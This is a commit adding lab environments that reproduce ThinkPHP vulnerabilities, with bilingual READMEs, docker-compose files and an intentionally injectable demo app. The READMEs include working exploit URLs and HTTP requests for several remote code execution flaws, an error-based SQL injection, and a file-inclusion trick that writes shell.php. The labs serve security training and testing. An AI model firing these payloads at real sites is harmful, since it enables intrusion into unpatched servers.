first commit

thinkphp/2-rce/README.md

@@ -0,0 +1,29 @@
+# ThinkPHP 2.x Remote Code Execution
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+ThinkPHP is a popular PHP framework widely used in China. ThinkPHP versions 2.x contain a remote code execution that caused by the `preg_replace`.
+
+In ThinkPHP 2.x, the framework uses `preg_replace` with `/e` modifier to match routes:
+
+```php
+$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));
+```
+
+This implementation causes user input parameters to be executed within double quotes, leading to arbitrary code execution. The vulnerability also exists in ThinkPHP 3.0 when running in Lite mode, as this issue wasn't patched in that specific mode.
+
+## Environment Setup
+
+Execute the following command to start a ThinkPHP 2.1 demo application:
+
+```bash
+docker compose up -d
+```
+
+After the server is started, you can visit `http://your-ip:8080/Index/Index` to see the default page.
+
+## Vulnerability Reproduction
+
+To exploit this vulnerability, we can inject PHP code through the URL parameters. By visiting `http://your-ip:8080/index.php?s=/index/index/name/${@phpinfo()}`, the `phpinfo()` function will be executed on the target server, demonstrating the successful exploitation of the remote code execution vulnerability:
+
+![](1.png)

thinkphp/2-rce/README.zh-cn.md

@@ -0,0 +1,27 @@
+# ThinkPHP 2.x 任意代码执行漏洞
+
+ThinkPHP是一个在中国被广泛使用的PHP框架。ThinkPHP 2.x版本中存在一个远程代码执行漏洞。
+
+在ThinkPHP 2.x版本中，框架使用`preg_replace`的`/e`模式匹配路由：
+
+```php
+$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));
+```
+
+这个实现导致用户的输入参数被插入双引号中执行，造成任意代码执行漏洞。值得注意的是，ThinkPHP 3.0版本在Lite模式下也存在这个漏洞，因为这个问题在该模式下并未被修复。
+
+## 环境搭建
+
+执行如下命令启动ThinkPHP 2.1的Demo应用：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8080/Index/Index`即可查看到默认页面。
+
+## 漏洞复现
+
+通过URL参数注入PHP代码来利用此漏洞。直接访问`http://your-ip:8080/index.php?s=/index/index/name/${@phpinfo()}`，服务器将执行`phpinfo()`函数，证明远程代码执行漏洞利用成功：
+
+![](1.png)

thinkphp/2-rce/docker-compose.yml

@@ -0,0 +1,5 @@
+services:
+ web:
+   image: vulhub/thinkphp:2.1
+   ports:
+    - "8080:80"

thinkphp/5-rce/README.md

@@ -0,0 +1,27 @@
+# Thinkphp5 5.0.22/5.1.29 Remote Code Execution Vulnerability
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+ThinkPHP is an extremely widely used PHP development framework in China. In its version 5, as the framework processes controller name incorrectly, it can execute any method if the website doesn't have mandatory routing enabled (which is default), resulting in a RCE vulnerability.
+
+Reference links：
+
+- http://www.thinkphp.cn/topic/60400.html
+- http://www.thinkphp.cn/topic/60390.html
+- https://xz.aliyun.com/t/3570
+
+## Environment Setup
+
+Enter the following command：(ThinkPHP version:5.0.20)
+
+```
+docker compose up -d
+```
+
+Visit `http://your-ip:8080` and you'll see the default page of ThinkPHP.
+
+## POC
+
+Directly visit `http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1` and it'll execute the phpinfo：
+
+![](1.png)

thinkphp/5-rce/README.zh-cn.md

@@ -0,0 +1,25 @@
+# ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞
+
+ThinkPHP是一款运用极广的PHP开发框架。其版本5中，由于没有正确处理控制器名，导致在网站没有开启强制路由的情况下（即默认情况下）可以执行任意方法，从而导致远程命令执行漏洞。
+
+参考链接：
+
+- http://www.thinkphp.cn/topic/60400.html
+- http://www.thinkphp.cn/topic/60390.html
+- https://xz.aliyun.com/t/3570
+
+## 漏洞环境
+
+运行ThinkPHP 5.0.20版本：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8080`即可看到ThinkPHP默认启动页面。
+
+## 漏洞复现
+
+直接访问`http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1`，即可执行phpinfo：
+
+![](1.png)

thinkphp/5-rce/docker-compose.yml

@@ -0,0 +1,5 @@
+services:
+ web:
+   image: vulhub/thinkphp:5.0.20
+   ports:
+    - "8080:80"

thinkphp/5.0.23-rce/README.md

@@ -0,0 +1,39 @@
+# ThinkPHP5 5.0.23 Remote Code Execution Vulnerability
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+ThinkPHP is an extremely widely used PHP development framework in China. In its version 5.0(<5.0.24), while obtaining the request method, the framework processes it incorrectly, which allows an attacker to call any method of the Request class, resulting in a RCE vulnerability through a specific exploit chain.
+
+References：
+
+- https://github.com/top-think/framework/commit/4a4b5e64fa4c46f851b4004005bff5f3196de003
+
+## Environment Setup
+
+Enter the following command：(ThinkPHP version: 5.0.23)
+
+```
+docker compose up -d
+```
+
+Visit `http://your-ip:8080` and you'll see the default page of ThinkPHP.
+
+## POC
+
+Send the packets and execute the command `id`:
+
+```
+POST /index.php?s=captcha HTTP/1.1
+Host: localhost
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 72
+
+_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id
+```
+
+![](1.png)

thinkphp/5.0.23-rce/README.zh-cn.md

@@ -0,0 +1,39 @@
+# ThinkPHP5 5.0.23 远程代码执行漏洞
+
+ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中，获取method的方法中没有正确处理方法名，导致攻击者可以调用Request类任意方法并构造利用链，从而导致远程代码执行漏洞。
+
+参考链接：
+
+- https://github.com/top-think/framework/commit/4a4b5e64fa4c46f851b4004005bff5f3196de003
+
+## 漏洞环境
+
+执行如下命令启动一个默认的thinkphp 5.0.23环境：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8080`即可看到默认的ThinkPHP启动页面。
+
+## 漏洞复现
+
+发送数据包：
+
+```
+POST /index.php?s=captcha HTTP/1.1
+Host: localhost
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 72
+
+_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id
+```
+
+成功执行`id`命令：
+
+![](1.png)

thinkphp/5.0.23-rce/docker-compose.yml

@@ -0,0 +1,5 @@
+services:
+ web:
+   image: vulhub/thinkphp:5.0.23
+   ports:
+    - "8080:80"

thinkphp/in-sqlinjection/README.md

@@ -0,0 +1,32 @@
+# ThinkPHP5 SQL Injection Vulnerability && Sensitive Information Disclosure Vulnerability
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+## Rationale
+
+Details to read the references：
+
+- https://www.leavesongs.com/PENETRATION/thinkphp5-in-sqlinjection.html
+- https://xz.aliyun.com/t/125
+
+## Environment Setup
+
+Enter the following command:
+
+```
+docker compose up -d
+```
+
+Visiting `http://your-ip/index.php?ids[]=1&ids[]=2`, you'll see the username is displayed, indicating that the environment is running successfully.
+
+## Exploit
+
+Open the page `http://your-ip/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1`，you will find messages revealed successfully：
+
+![](01.png)
+
+And you can find the account and password of the database through the debug page.
+
+![](02.png)
+
+This is another sensitive information disclosure vulnerability.

thinkphp/in-sqlinjection/README.zh-cn.md

@@ -0,0 +1,30 @@
+# ThinkPHP5 SQL注入漏洞 && 敏感信息泄露
+
+运行环境：
+
+```
+docker compose up -d
+```
+
+启动后，访问`http://your-ip/index.php?ids[]=1&ids[]=2`，即可看到用户名被显示了出来，说明环境运行成功。
+
+## 漏洞原理
+
+漏洞原理说明：
+
+- https://www.leavesongs.com/PENETRATION/thinkphp5-in-sqlinjection.html
+- https://xz.aliyun.com/t/125
+
+不再赘述。
+
+## 漏洞利用
+
+访问`http://your-ip/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1`，信息成功被爆出：
+
+![](01.png)
+
+当然，这是一个比较鸡肋的SQL注入漏洞。但通过DEBUG页面，我们找到了数据库的账号、密码：
+
+![](02.png)
+
+这又属于一个敏感信息泄露漏洞。

thinkphp/in-sqlinjection/docker-compose.yml

@@ -0,0 +1,18 @@
+services:
+ web:
+   image: vulhub/thinkphp:5.0.9
+   depends_on:
+    - mysql
+   ports:
+    - "80:80"
+   volumes:
+    - ./www/controller:/var/www/application/index/controller
+    - ./www/model:/var/www/application/index/model
+    - ./www/database.php:/var/www/application/database.php
+ mysql:
+   image: mysql:5.5
+   environment: 
+    - MYSQL_ROOT_PASSWORD=root
+    - MYSQL_DATABASE=cat
+   volumes:
+    - ./www/init.sql:/docker-entrypoint-initdb.d/init.sql

thinkphp/in-sqlinjection/www/controller/Index.php

@@ -0,0 +1,17 @@
+<?php
+namespace app\index\controller;
+
+use app\index\model\User;
+
+class Index
+{
+    public function index()
+    {
+        $ids = input('ids/a');
+        $t = new User();
+        $result = $t->where('id', 'in', $ids)->select();
+        foreach($result as $row) {
+            echo "<p>Hello, {$row['username']}</p>";
+        }
+    }
+}

thinkphp/in-sqlinjection/www/database.php

@@ -0,0 +1,51 @@
+<?php
+// +----------------------------------------------------------------------
+// | ThinkPHP [ WE CAN DO IT JUST THINK ]
+// +----------------------------------------------------------------------
+// | Copyright (c) 2006~2016 http://thinkphp.cn All rights reserved.
+// +----------------------------------------------------------------------
+// | Licensed ( http://www.apache.org/licenses/LICENSE-2.0 )
+// +----------------------------------------------------------------------
+// | Author: liu21st <liu21st@gmail.com>
+// +----------------------------------------------------------------------
+
+return [
+    // 数据库类型
+    'type'           => 'mysql',
+    // 服务器地址
+    'hostname'       => 'mysql',
+    // 数据库名
+    'database'       => 'cat',
+    // 用户名
+    'username'       => 'root',
+    // 密码
+    'password'       => 'root',
+    // 端口
+    'hostport'       => '',
+    // 连接dsn
+    'dsn'            => '',
+    // 数据库连接参数
+    'params'         => [],
+    // 数据库编码默认采用utf8
+    'charset'        => 'utf8',
+    // 数据库表前缀
+    'prefix'         => '',
+    // 数据库调试模式
+    'debug'          => true,
+    // 数据库部署方式:0 集中式(单一服务器),1 分布式(主从服务器)
+    'deploy'         => 0,
+    // 数据库读写是否分离 主从式有效
+    'rw_separate'    => false,
+    // 读写分离后 主服务器数量
+    'master_num'     => 1,
+    // 指定从服务器序号
+    'slave_no'       => '',
+    // 是否严格检查字段是否存在
+    'fields_strict'  => true,
+    // 数据集返回类型 array 数组 collection Collection对象
+    'resultset_type' => 'array',
+    // 是否自动写入时间戳字段
+    'auto_timestamp' => false,
+    // 是否需要进行SQL性能分析
+    'sql_explain'    => false,
+];

thinkphp/in-sqlinjection/www/init.sql

@@ -0,0 +1,13 @@
+USE `cat`;
+
+CREATE TABLE IF NOT EXISTS `user` (
+  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
+  `username` varchar(255) NOT NULL,
+  `password` varchar(255) NOT NULL,
+  PRIMARY KEY (`id`)
+) AUTO_INCREMENT=1 ;
+
+INSERT INTO `user` (`username`, `password`) VALUES
+('admin', 'admin');
+INSERT INTO `user` (`username`, `password`) VALUES
+('test', 'test');

thinkphp/in-sqlinjection/www/model/User.php

@@ -0,0 +1,9 @@
+<?php
+namespace app\index\model;
+
+use think\Model;
+
+class User extends Model
+{
+    protected $table = 'user';
+}

thinkphp/lang-rce/README.md

@@ -0,0 +1,57 @@
+# ThinkPHP Lang Local File Inclusion
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+ThinkPHP is an extremely widely used PHP development framework in China. In the version prior to 6.0.13, a local restricted file inclusion issue exists in `lang` parameter if the developer enable multiple language pack.
+
+Although this issue is only allowed to include ".php" file, the attacker is still able to use the "pearcmd.php" to write arbitrary file and execute code in the server.
+
+References:
+
+- <https://tttang.com/archive/1865/>
+- <https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html#0x06-pearcmdphp> (about the "pearcmd.php trick")
+
+## Vulnerability Environment
+
+Execute following command to start a server that is developed by ThinkPHP v6.0.12:
+
+```
+docker compose up -d
+```
+
+After the server is started, browse the `http://your-ip:8080` to see the default welcome page of ThinkPHP.
+
+## Exploit
+
+Firstly, because the multiple language feature is not enabled by default, you can try to include the `public/index.php` to determine whether the vulnerability exists:
+
+```
+http://localhost:8080/?lang=../../../../../public/index
+```
+
+![](1.png)
+
+The vulnerability exists if the server crashed and a 500 error response comes back.
+
+Then, try to write data through "/usr/local/lib/php/pearcmd.php":
+
+```
+GET /?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/<?=phpinfo()?>+shell.php HTTP/1.1
+Host: localhost:8080
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+
+
+```
+
+If the server response the output of pearcmd, which means the exploit is successful:
+
+![](2.png)
+
+As you can see, the `shell.php` is written in root directory of web:
+
+![](3.png)

thinkphp/lang-rce/README.zh-cn.md

@@ -0,0 +1,56 @@
+# ThinkPHP 多语言本地文件包含漏洞
+
+ThinkPHP是一个在中国使用较多的PHP框架。在其6.0.13版本及以前，存在一处本地文件包含漏洞。当多语言特性被开启时，攻击者可以使用`lang`参数来包含任意PHP文件。
+
+虽然只能包含本地PHP文件，但在开启了`register_argc_argv`且安装了pcel/pear的环境下，可以包含`/usr/local/lib/php/pearcmd.php`并写入任意文件。
+
+参考链接：
+
+- <https://tttang.com/archive/1865/>
+- <https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html#0x06-pearcmdphp> （本文介绍了`pearcmd.php`利用技巧的原理）
+
+## 漏洞环境
+
+执行如下命令启动一个使用ThinkPHP 6.0.12版本开发的Web应用：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8080`即可查看到ThinkPHP默认的欢迎页面。
+
+## 漏洞利用
+
+首先，ThinkPHP多语言特性不是默认开启的，所以我们可以尝试包含`public/index.php`文件来确认文件包含漏洞是否存在：
+
+![](1.png)
+
+如果漏洞存在，则服务器会出错，返回500页面。
+
+文件包含漏洞存在的情况下还需要服务器满足下面两个条件才能利用：
+
+1. PHP环境开启了`register_argc_argv`
+2. PHP环境安装了pcel/pear
+
+Docker默认的PHP环境恰好满足上述条件，所以我们可以直接使用下面这个数据包来在写`shell.php`文件：
+
+```
+GET /?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/<?=phpinfo()?>+shell.php HTTP/1.1
+Host: localhost:8080
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+
+
+```
+
+如果服务器返回pearcmd的命令行执行结果，说明漏洞利用成功：
+
+![](2.png)
+
+此时访问`http://your-ip:8080/shell.php`即可发现已经成功写入文件：
+
+![](3.png)

thinkphp/lang-rce/docker-compose.yml

@@ -0,0 +1,5 @@
+services:
+ web:
+   image: vulhub/thinkphp:6.0.12
+   ports:
+    - "8080:80"